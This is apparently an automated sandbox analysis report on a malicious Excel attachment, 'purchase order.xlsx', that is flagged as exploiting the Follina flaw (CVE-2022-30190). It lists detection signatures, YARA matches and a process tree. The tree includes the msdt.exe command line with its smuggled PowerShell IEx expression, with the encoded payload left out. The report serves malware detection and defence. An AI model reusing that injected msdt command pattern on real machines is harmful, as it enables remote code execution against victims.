Windows
Analysis Report
purchase order.xlsx
Overview
General Information
Detection
Follina CVE-2022-30190
| Score | 68 |
|---|---|
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Classification
- System is w10x64
- EXCEL.EXE (PID: 1388, cmdline: `"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding`, MD5: 5D6638F2C8F8571C593999C58866007E)
  - msdt.exe (PID: 6596, cmdline: `C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx(` [obfuscated PowerShell with embedded base64 payload omitted] `)) ... .Msi`, MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
    - csc.exe (PID: 2436, cmdline: `C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline`, MD5: 350C52F71BDED7B99668585C15D70EEA)
      - cvtres.exe (PID: 2320, cmdline: `C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"`, MD5: C09985AE74F0882F208D75DE27770DFA)
    - csc.exe (PID: 6112, cmdline: `C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline`, MD5: 350C52F71BDED7B99668585C15D70EEA)
      - cvtres.exe (PID: 5636, cmdline: `C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"`, MD5: C09985AE74F0882F208D75DE27770DFA)
    - csc.exe (PID: 6460, cmdline: `C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline`, MD5: 350C52F71BDED7B99668585C15D70EEA)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard | |
| | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
| | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard | |
| | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
| | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
No Sigma rule has matched
No Snort rule has matched
AV Detection
- Source: ReversingLabs

Exploits
- Source: File source
- Source: File source
- Source: File source
- Source: File opened

Software Vulnerabilities
- Source: Process created
- Source: TCP traffic
- Source: TCP traffic
- Source: Memory has grown
- Source: HTTP traffic detected
- Source: HTTP traffic detected
- Source: HTTP traffic detected